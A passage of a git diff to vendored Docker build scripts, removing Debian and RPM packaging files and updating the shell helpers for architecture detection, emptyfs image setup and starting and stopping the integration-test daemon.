a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init deleted file mode 120000 index 8cb89d30dd..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/init/sysvinit-debian/docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart deleted file mode 120000 index 7e1b64a3e6..0000000000 --- 
a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/init/upstart/docker.conf \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install deleted file mode 100644 index dc6b25f04f..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install +++ /dev/null @@ -1,12 +0,0 @@ -#contrib/syntax/vim/doc/* /usr/share/vim/vimfiles/doc/ -#contrib/syntax/vim/ftdetect/* /usr/share/vim/vimfiles/ftdetect/ -#contrib/syntax/vim/syntax/* /usr/share/vim/vimfiles/syntax/ -contrib/*-integration usr/share/docker-engine/contrib/ -contrib/check-config.sh usr/share/docker-engine/contrib/ -contrib/completion/fish/docker.fish usr/share/fish/vendor_completions.d/ -contrib/completion/zsh/_docker usr/share/zsh/vendor-completions/ -contrib/init/systemd/docker.service lib/systemd/system/ -contrib/init/systemd/docker.socket lib/systemd/system/ -contrib/mk* usr/share/docker-engine/contrib/ -contrib/nuke-graph-directory.sh usr/share/docker-engine/contrib/ -contrib/syntax/nano/Dockerfile.nanorc usr/share/nano/ diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages deleted file mode 100644 index 1aa62186a6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages +++ /dev/null @@ -1 +0,0 @@ -man/man*/* diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst deleted file mode 100644 index eeef6ca801..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh -set -e - -case "$1" in - configure) - if [ -z "$2" ]; then - if ! 
getent group docker > /dev/null; then - groupadd --system docker - fi - fi - ;; - abort-*) - # How'd we get here?? - exit 1 - ;; - *) - ;; -esac - -#DEBHELPER# diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev deleted file mode 120000 index 914a361959..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev +++ /dev/null @@ -1 +0,0 @@ -../../../contrib/udev/80-docker.rules \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docs b/vendor/github.com/docker/docker/hack/make/.build-deb/docs deleted file mode 100644 index b43bf86b50..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/docs +++ /dev/null @@ -1 +0,0 @@ -README.md diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/rules b/vendor/github.com/docker/docker/hack/make/.build-deb/rules deleted file mode 100755 index 6522103e5d..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-deb/rules +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/make -f - -VERSION = $(shell cat VERSION) -SYSTEMD_VERSION := $(shell dpkg-query -W -f='$${Version}\n' systemd | cut -d- -f1) -SYSTEMD_GT_227 := $(shell [ '$(SYSTEMD_VERSION)' ] && [ '$(SYSTEMD_VERSION)' -gt 227 ] && echo true ) - -override_dh_gencontrol: - # if we're on Ubuntu, we need to Recommends: apparmor - echo 'apparmor:Recommends=$(shell dpkg-vendor --is Ubuntu && echo apparmor)' >> debian/docker-engine.substvars - dh_gencontrol - -override_dh_auto_build: - ./hack/make.sh dynbinary - # ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here - -override_dh_auto_test: - ./bundles/$(VERSION)/dynbinary-daemon/dockerd -v - ./bundles/$(VERSION)/dynbinary-client/docker -v - -override_dh_strip: - # Go has lots of problems with stripping, so just don't - -override_dh_auto_install: - mkdir -p 
debian/docker-engine/usr/bin - cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-client/docker)" debian/docker-engine/usr/bin/docker - cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-daemon/dockerd)" debian/docker-engine/usr/bin/dockerd - cp -aT /usr/local/bin/docker-proxy debian/docker-engine/usr/bin/docker-proxy - cp -aT /usr/local/bin/docker-containerd debian/docker-engine/usr/bin/docker-containerd - cp -aT /usr/local/bin/docker-containerd-shim debian/docker-engine/usr/bin/docker-containerd-shim - cp -aT /usr/local/bin/docker-containerd-ctr debian/docker-engine/usr/bin/docker-containerd-ctr - cp -aT /usr/local/bin/docker-runc debian/docker-engine/usr/bin/docker-runc - cp -aT /usr/local/bin/docker-init debian/docker-engine/usr/bin/docker-init - mkdir -p debian/docker-engine/usr/lib/docker - -override_dh_installinit: - # use "docker" as our service name, not "docker-engine" - dh_installinit --name=docker -ifeq (true, $(SYSTEMD_GT_227)) - $(warning "Setting TasksMax=infinity") - sed -i -- 's/#TasksMax=infinity/TasksMax=infinity/' debian/docker-engine/lib/systemd/system/docker.service -endif - -override_dh_installudev: - # match our existing priority - dh_installudev --priority=z80 - -override_dh_install: - dh_install - dh_apparmor --profile-name=docker-engine -pdocker-engine - -override_dh_shlibdeps: - dh_shlibdeps --dpkg-shlibdeps-params=--ignore-missing-info - -%: - dh $@ --with=bash-completion $(shell command -v dh_systemd_enable > /dev/null 2>&1 && echo --with=systemd) diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec deleted file mode 100644 index ae597bd774..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec +++ /dev/null @@ -1,96 +0,0 @@ -# Some bits borrowed from the openstack-selinux package -Name: docker-engine-selinux -Version: %{_version} -Release: %{_release}%{?dist} -Summary: 
SELinux Policies for the open-source application container engine -BuildArch: noarch -Group: Tools/Docker - -License: GPLv2 -Source: %{name}.tar.gz - -URL: https://dockerproject.org -Vendor: Docker -Packager: Docker - -%global selinux_policyver 3.13.1-102 -%global selinuxtype targeted -%global moduletype services -%global modulenames docker - -Requires(post): selinux-policy-base >= %{selinux_policyver}, selinux-policy-targeted >= %{selinux_policyver}, policycoreutils, policycoreutils-python libselinux-utils -BuildRequires: selinux-policy selinux-policy-devel - -# conflicting packages -Conflicts: docker-selinux - -# Usage: _format var format -# Expand 'modulenames' into various formats as needed -# Format must contain '$x' somewhere to do anything useful -%global _format() export %1=""; for x in %{modulenames}; do %1+=%2; %1+=" "; done; - -# Relabel files -%global relabel_files() \ - /sbin/restorecon -R %{_bindir}/docker %{_localstatedir}/run/docker.sock %{_localstatedir}/run/docker.pid %{_sysconfdir}/docker %{_localstatedir}/log/docker %{_localstatedir}/log/lxc %{_localstatedir}/lock/lxc %{_usr}/lib/systemd/system/docker.service /root/.docker &> /dev/null || : \ - -%description -SELinux policy modules for use with Docker - -%prep -%if 0%{?centos} <= 6 -%setup -n %{name} -%else -%autosetup -n %{name} -%endif - -%build -make SHARE="%{_datadir}" TARGETS="%{modulenames}" - -%install - -# Install SELinux interfaces -%_format INTERFACES $x.if -install -d %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} -install -p -m 644 $INTERFACES %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} - -# Install policy modules -%_format MODULES $x.pp.bz2 -install -d %{buildroot}%{_datadir}/selinux/packages -install -m 0644 $MODULES %{buildroot}%{_datadir}/selinux/packages - -%post -# -# Install all modules in a single transaction -# -if [ $1 -eq 1 ]; then - %{_sbindir}/setsebool -P -N virt_use_nfs=1 virt_sandbox_use_all_caps=1 -fi -%_format MODULES 
%{_datadir}/selinux/packages/$x.pp.bz2 -%{_sbindir}/semodule -n -s %{selinuxtype} -i $MODULES -if %{_sbindir}/selinuxenabled ; then - %{_sbindir}/load_policy - %relabel_files - if [ $1 -eq 1 ]; then - restorecon -R %{_sharedstatedir}/docker - fi -fi - -%postun -if [ $1 -eq 0 ]; then - %{_sbindir}/semodule -n -r %{modulenames} &> /dev/null || : - if %{_sbindir}/selinuxenabled ; then - %{_sbindir}/load_policy - %relabel_files - fi -fi - -%files -%doc LICENSE -%defattr(-,root,root,0755) -%attr(0644,root,root) %{_datadir}/selinux/packages/*.pp.bz2 -%attr(0644,root,root) %{_datadir}/selinux/devel/include/%{moduletype}/*.if - -%changelog -* Tue Dec 1 2015 Jessica Frazelle 1.9.1-1 -- add licence to rpm -- add selinux-policy and docker-engine-selinux rpm diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec deleted file mode 100644 index d53e55b6c9..0000000000 --- a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec +++ /dev/null @@ -1,254 +0,0 @@ -Name: docker-engine -Version: %{_version} -Release: %{_release}%{?dist} -Summary: The open-source application container engine -Group: Tools/Docker - -License: ASL 2.0 -Source: %{name}.tar.gz - -URL: https://dockerproject.org -Vendor: Docker -Packager: Docker - -# is_systemd conditional -%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?suse_version} >= 1210 -%global is_systemd 1 -%endif - -# required packages for build -# most are already in the container (see contrib/builder/rpm/ARCH/generate.sh) -# only require systemd on those systems -%if 0%{?is_systemd} -%if 0%{?suse_version} >= 1210 -BuildRequires: systemd-rpm-macros -%{?systemd_requires} -%else -%if 0%{?fedora} >= 25 -# Systemd 230 and up no longer have libsystemd-journal (see https://bugzilla.redhat.com/show_bug.cgi?id=1350301) -BuildRequires: pkgconfig(systemd) -Requires: systemd-units -%else -BuildRequires: pkgconfig(systemd) 
-Requires: systemd-units -BuildRequires: pkgconfig(libsystemd-journal) -%endif -%endif -%else -Requires(post): chkconfig -Requires(preun): chkconfig -# This is for /sbin/service -Requires(preun): initscripts -%endif - -# required packages on install -Requires: /bin/sh -Requires: iptables -%if !0%{?suse_version} -Requires: libcgroup -%else -Requires: libcgroup1 -%endif -Requires: tar -Requires: xz -%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -# Resolves: rhbz#1165615 -Requires: device-mapper-libs >= 1.02.90-1 -%endif -%if 0%{?oraclelinux} >= 6 -# Require Oracle Unbreakable Enterprise Kernel R4 and newer device-mapper -Requires: kernel-uek >= 4.1 -Requires: device-mapper >= 1.02.90-2 -%endif - -# docker-selinux conditional -%if 0%{?fedora} >= 20 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -%global with_selinux 1 -%endif - -# DWZ problem with multiple golang binary, see bug -# https://bugzilla.redhat.com/show_bug.cgi?id=995136#c12 -%if 0%{?fedora} >= 20 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -%global _dwz_low_mem_die_limit 0 -%endif - -# start if with_selinux -%if 0%{?with_selinux} -# Version of SELinux we were using -%if 0%{?fedora} == 20 -%global selinux_policyver 3.12.1-197 -%endif # fedora 20 -%if 0%{?fedora} == 21 -%global selinux_policyver 3.13.1-105 -%endif # fedora 21 -%if 0%{?fedora} >= 22 -%global selinux_policyver 3.13.1-128 -%endif # fedora 22 -%if 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 -%global selinux_policyver 3.13.1-23 -%endif # centos,oraclelinux 7 -%endif # with_selinux - -# RE: rhbz#1195804 - ensure min NVR for selinux-policy -%if 0%{?with_selinux} -Requires: selinux-policy >= %{selinux_policyver} -Requires(pre): %{name}-selinux >= %{version}-%{release} -%endif # with_selinux - -# conflicting packages -Conflicts: docker -Conflicts: docker-io -Conflicts: docker-engine-cs - -%description -Docker is an open source project to build, ship and run any application as a 
-lightweight container. - -Docker containers are both hardware-agnostic and platform-agnostic. This means -they can run anywhere, from your laptop to the largest EC2 compute instance and -everything in between - and they don't require you to use a particular -language, framework or packaging system. That makes them great building blocks -for deploying and scaling web apps, databases, and backend services without -depending on a particular stack or provider. - -%prep -%if 0%{?centos} <= 6 || 0%{?oraclelinux} <=6 -%setup -n %{name} -%else -%autosetup -n %{name} -%endif - -%build -export DOCKER_GITCOMMIT=%{_gitcommit} -./hack/make.sh dynbinary -# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here - -%check -./bundles/%{_origversion}/dynbinary-client/docker -v -./bundles/%{_origversion}/dynbinary-daemon/dockerd -v - -%install -# install binary -install -d $RPM_BUILD_ROOT/%{_bindir} -install -p -m 755 bundles/%{_origversion}/dynbinary-client/docker-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/docker -install -p -m 755 bundles/%{_origversion}/dynbinary-daemon/dockerd-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/dockerd - -# install proxy -install -p -m 755 /usr/local/bin/docker-proxy $RPM_BUILD_ROOT/%{_bindir}/docker-proxy - -# install containerd -install -p -m 755 /usr/local/bin/docker-containerd $RPM_BUILD_ROOT/%{_bindir}/docker-containerd -install -p -m 755 /usr/local/bin/docker-containerd-shim $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-shim -install -p -m 755 /usr/local/bin/docker-containerd-ctr $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-ctr - -# install runc -install -p -m 755 /usr/local/bin/docker-runc $RPM_BUILD_ROOT/%{_bindir}/docker-runc - -# install tini -install -p -m 755 /usr/local/bin/docker-init $RPM_BUILD_ROOT/%{_bindir}/docker-init - -# install udev rules -install -d $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d -install -p -m 644 contrib/udev/80-docker.rules 
$RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d/80-docker.rules - -# add init scripts -install -d $RPM_BUILD_ROOT/etc/sysconfig -install -d $RPM_BUILD_ROOT/%{_initddir} - - -%if 0%{?is_systemd} -install -d $RPM_BUILD_ROOT/%{_unitdir} -install -p -m 644 contrib/init/systemd/docker.service.rpm $RPM_BUILD_ROOT/%{_unitdir}/docker.service -%else -install -p -m 644 contrib/init/sysvinit-redhat/docker.sysconfig $RPM_BUILD_ROOT/etc/sysconfig/docker -install -p -m 755 contrib/init/sysvinit-redhat/docker $RPM_BUILD_ROOT/%{_initddir}/docker -%endif -# add bash, zsh, and fish completions -install -d $RPM_BUILD_ROOT/usr/share/bash-completion/completions -install -d $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions -install -d $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d -install -p -m 644 contrib/completion/bash/docker $RPM_BUILD_ROOT/usr/share/bash-completion/completions/docker -install -p -m 644 contrib/completion/zsh/_docker $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions/_docker -install -p -m 644 contrib/completion/fish/docker.fish $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d/docker.fish - -# install manpages -install -d %{buildroot}%{_mandir}/man1 -install -p -m 644 man/man1/*.1 $RPM_BUILD_ROOT/%{_mandir}/man1 -install -d %{buildroot}%{_mandir}/man5 -install -p -m 644 man/man5/*.5 $RPM_BUILD_ROOT/%{_mandir}/man5 -install -d %{buildroot}%{_mandir}/man8 -install -p -m 644 man/man8/*.8 $RPM_BUILD_ROOT/%{_mandir}/man8 - -# add vimfiles -install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc -install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect -install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax -install -p -m 644 contrib/syntax/vim/doc/dockerfile.txt $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc/dockerfile.txt -install -p -m 644 contrib/syntax/vim/ftdetect/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect/dockerfile.vim -install -p -m 644 contrib/syntax/vim/syntax/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax/dockerfile.vim - -# 
add nano -install -d $RPM_BUILD_ROOT/usr/share/nano -install -p -m 644 contrib/syntax/nano/Dockerfile.nanorc $RPM_BUILD_ROOT/usr/share/nano/Dockerfile.nanorc - -# list files owned by the package here -%files -%doc AUTHORS CHANGELOG.md CONTRIBUTING.md LICENSE MAINTAINERS NOTICE README.md -/%{_bindir}/docker -/%{_bindir}/dockerd -/%{_bindir}/docker-containerd -/%{_bindir}/docker-containerd-shim -/%{_bindir}/docker-containerd-ctr -/%{_bindir}/docker-proxy -/%{_bindir}/docker-runc -/%{_bindir}/docker-init -/%{_sysconfdir}/udev/rules.d/80-docker.rules -%if 0%{?is_systemd} -/%{_unitdir}/docker.service -%else -%config(noreplace,missingok) /etc/sysconfig/docker -/%{_initddir}/docker -%endif -/usr/share/bash-completion/completions/docker -/usr/share/zsh/vendor-completions/_docker -/usr/share/fish/vendor_completions.d/docker.fish -%doc -/%{_mandir}/man1/* -/%{_mandir}/man5/* -/%{_mandir}/man8/* -/usr/share/vim/vimfiles/doc/dockerfile.txt -/usr/share/vim/vimfiles/ftdetect/dockerfile.vim -/usr/share/vim/vimfiles/syntax/dockerfile.vim -/usr/share/nano/Dockerfile.nanorc - -%post -%if 0%{?is_systemd} -%systemd_post docker -%else -# This adds the proper /etc/rc*.d links for the script -/sbin/chkconfig --add docker -%endif -if ! 
getent group docker > /dev/null; then - groupadd --system docker -fi - -%preun -%if 0%{?is_systemd} -%systemd_preun docker -%else -if [ $1 -eq 0 ] ; then - /sbin/service docker stop >/dev/null 2>&1 - /sbin/chkconfig --del docker -fi -%endif - -%postun -%if 0%{?is_systemd} -%systemd_postun_with_restart docker -%else -if [ "$1" -ge "1" ] ; then - /sbin/service docker condrestart >/dev/null 2>&1 || : -fi -%endif - -%changelog diff --git a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch index 73955392d0..91e2c53c75 100644 --- a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch +++ b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch @@ -1,7 +1,11 @@ -#!/bin/bash +#!/usr/bin/env bash set -e docker-version-osarch() { + if ! type docker &>/dev/null; then + # docker is not installed + return + fi local target="$1" # "Client" or "Server" local fmtStr="{{.${target}.Os}}/{{.${target}.Arch}}" if docker version -f "$fmtStr" 2>/dev/null; then @@ -19,7 +23,7 @@ docker-version-osarch() { } # Retrieve OS/ARCH of docker daemon, e.g. 
linux/amd64 -export DOCKER_ENGINE_OSARCH="$(docker-version-osarch 'Server')" +export DOCKER_ENGINE_OSARCH="${DOCKER_ENGINE_OSARCH:=$(docker-version-osarch 'Server')}" export DOCKER_ENGINE_GOOS="${DOCKER_ENGINE_OSARCH%/*}" export DOCKER_ENGINE_GOARCH="${DOCKER_ENGINE_OSARCH##*/}" DOCKER_ENGINE_GOARCH=${DOCKER_ENGINE_GOARCH:=amd64} @@ -30,40 +34,10 @@ export DOCKER_CLIENT_GOOS="${DOCKER_CLIENT_OSARCH%/*}" export DOCKER_CLIENT_GOARCH="${DOCKER_CLIENT_OSARCH##*/}" DOCKER_CLIENT_GOARCH=${DOCKER_CLIENT_GOARCH:=amd64} -# Retrieve the architecture used in contrib/builder/(deb|rpm)/$PACKAGE_ARCH/ -PACKAGE_ARCH='amd64' -case "${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" in - arm) - PACKAGE_ARCH='armhf' - ;; - arm64) - PACKAGE_ARCH='aarch64' - ;; - amd64|ppc64le|s390x) - PACKAGE_ARCH="${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" - ;; - *) - echo >&2 "warning: not sure how to convert '$DOCKER_ENGINE_GOARCH' to a 'Docker' arch, assuming '$PACKAGE_ARCH'" - ;; -esac -export PACKAGE_ARCH - DOCKERFILE='Dockerfile' -TEST_IMAGE_NAMESPACE= -case "$PACKAGE_ARCH" in - amd64) - case "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" in - windows) - DOCKERFILE='Dockerfile.windows' - ;; - solaris) - DOCKERFILE='Dockerfile.solaris' - ;; - esac - ;; - *) - DOCKERFILE="Dockerfile.$PACKAGE_ARCH" - TEST_IMAGE_NAMESPACE="$PACKAGE_ARCH" - ;; -esac -export DOCKERFILE TEST_IMAGE_NAMESPACE + +if [ "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" = "windows" ]; then + DOCKERFILE='Dockerfile.windows' +fi + +export DOCKERFILE diff --git a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs index e71a30ae81..898cc22834 100644 --- a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs +++ b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs @@ -1,23 +1,23 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -if ! docker inspect emptyfs &> /dev/null; then - # let's build a "docker save" tarball for "emptyfs" +if ! 
docker image inspect emptyfs > /dev/null; then + # build a "docker save" tarball for "emptyfs" # see https://github.com/docker/docker/pull/5262 # and also https://github.com/docker/docker/issues/4242 dir="$DEST/emptyfs" - mkdir -p "$dir" + uuid=511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 + mkdir -p "$dir/$uuid" ( - cd "$dir" - echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > repositories - mkdir -p 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 - ( - cd 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158 - echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json - echo '1.0' > VERSION - tar -cf layer.tar --files-from /dev/null - ) + echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > "$dir/repositories" + cd "$dir/$uuid" + echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > 
json + echo '1.0' > VERSION + tar -cf layer.tar --files-from /dev/null + ) + ( + [ -n "$TESTDEBUG" ] && set -x + tar -cC "$dir" . | docker load ) - ( set -x; tar -cC "$dir" . | docker load ) rm -rf "$dir" fi diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen b/vendor/github.com/docker/docker/hack/make/.go-autogen index 4d26052bb7..ba001895d8 100644 --- a/vendor/github.com/docker/docker/hack/make/.go-autogen +++ b/vendor/github.com/docker/docker/hack/make/.go-autogen @@ -1,8 +1,10 @@ -#!/bin/bash +#!/usr/bin/env bash rm -rf autogen -source hack/dockerfile/binaries-commits +source hack/dockerfile/install/runc.installer +source hack/dockerfile/install/tini.installer +source hack/dockerfile/install/containerd.installer cat > dockerversion/version_autogen.go < param( [Parameter(Mandatory=$true)][string]$CommitString, - [Parameter(Mandatory=$true)][string]$DockerVersion + [Parameter(Mandatory=$true)][string]$DockerVersion, + [Parameter(Mandatory=$false)][string]$Platform ) $ErrorActionPreference = "Stop" @@ -43,6 +44,7 @@ const ( GitCommit string = "'+$CommitString+'" Version string = "'+$DockerVersion+'" BuildTime string = "'+$buildDateTime+'" + PlatformName string = "'+$Platform+'" ) // AUTOGENERATED FILE; see hack\make\.go-autogen.ps1 diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup index 0efde717fc..c130e23560 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup @@ -1,7 +1,7 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -bundle .detect-daemon-osarch -if [ $DOCKER_ENGINE_GOOS != "windows" ]; then +source "$MAKEDIR/.detect-daemon-osarch" +if [ "$DOCKER_ENGINE_GOOS" != "windows" ]; then bundle .ensure-emptyfs fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start 
b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start index b96979bdb2..20801fccee 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start @@ -1,12 +1,19 @@ -#!/bin/bash +#!/usr/bin/env bash -# see test-integration-cli for example usage of this script +# see test-integration for example usage of this script base="$ABS_DEST/.." -export PATH="$base/binary-client:$base/binary-daemon:$base/dynbinary-client:$base/dynbinary-daemon:$PATH" +export PATH="$base/binary-daemon:$base/dynbinary-daemon:$PATH" -if ! command -v docker &> /dev/null; then - echo >&2 'error: binary-client or dynbinary-client must be run before .integration-daemon-start' +export TEST_CLIENT_BINARY=docker + +if [ -n "$DOCKER_CLI_PATH" ]; then + export TEST_CLIENT_BINARY=/usr/local/cli/$(basename "$DOCKER_CLI_PATH") +fi + +echo "Using test binary $TEST_CLIENT_BINARY" +if ! command -v "$TEST_CLIENT_BINARY" &> /dev/null; then + echo >&2 'error: missing test client $TEST_CLIENT_BINARY' false fi @@ -44,12 +51,13 @@ if [ -n "$DOCKER_STORAGE_OPTS" ]; then unset IFS fi -# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +# example usage: DOCKER_REMAP_ROOT=default extra_params="" if [ "$DOCKER_REMAP_ROOT" ]; then extra_params="--userns-remap $DOCKER_REMAP_ROOT" fi +# example usage: DOCKER_EXPERIMENTAL=1 if [ "$DOCKER_EXPERIMENTAL" ]; then echo >&2 '# DOCKER_EXPERIMENTAL is set: starting daemon with experimental features enabled! 
' extra_params="$extra_params --experimental" @@ -62,24 +70,26 @@ if [ -z "$DOCKER_TEST_HOST" ]; then # see https://github.com/docker/libcontainer/blob/master/apparmor/apparmor.go#L16 export container="" ( - set -x + [ -n "$TESTDEBUG" ] && set -x /etc/init.d/apparmor start ) fi - export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" # "pwd" tricks to make sure $DEST is an absolute path, not a relative one - ( set -x; exec \ - dockerd --debug \ - --host "$DOCKER_HOST" \ - --storage-driver "$DOCKER_GRAPHDRIVER" \ - --pidfile "$DEST/docker.pid" \ - --userland-proxy="$DOCKER_USERLANDPROXY" \ - $storage_params \ - $extra_params \ - &> "$DEST/docker.log" + # "pwd" tricks to make sure $DEST is an absolute path, not a relative one + export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" + ( + echo "Starting dockerd" + [ -n "$TESTDEBUG" ] && set -x + exec \ + dockerd --debug \ + --host "$DOCKER_HOST" \ + --storage-driver "$DOCKER_GRAPHDRIVER" \ + --pidfile "$DEST/docker.pid" \ + --userland-proxy="$DOCKER_USERLANDPROXY" \ + $storage_params \ + $extra_params \ + &> "$DEST/docker.log" ) & - # make sure that if the script exits unexpectedly, we stop this daemon we just started - trap 'bundle .integration-daemon-stop' EXIT else export DOCKER_HOST="$DOCKER_TEST_HOST" fi @@ -87,7 +97,7 @@ fi # give it a little time to come up so it's "ready" tries=60 echo "INFO: Waiting for daemon to start..." -while ! docker version &> /dev/null; do +while ! $TEST_CLIENT_BINARY version &> /dev/null; do (( tries-- )) if [ $tries -le 0 ]; then printf "\n" @@ -95,8 +105,8 @@ while ! 
docker version &> /dev/null; do echo >&2 "error: daemon failed to start" echo >&2 " check $DEST/docker.log for details" else - echo >&2 "error: daemon at $DOCKER_HOST fails to 'docker version':" - docker version >&2 || true + echo >&2 "error: daemon at $DOCKER_HOST fails to '$TEST_CLIENT_BINARY version':" + $TEST_CLIENT_BINARY version >&2 || true # Additional Windows CI debugging as this is a common error as of # January 2016 if [ "$(go env GOOS)" = 'windows' ]; then diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop index 03c1b14689..c1d43e1a5e 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop +++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop @@ -1,11 +1,12 @@ -#!/bin/bash +#!/usr/bin/env bash if [ ! "$(go env GOOS)" = 'windows' ]; then - trap - EXIT # 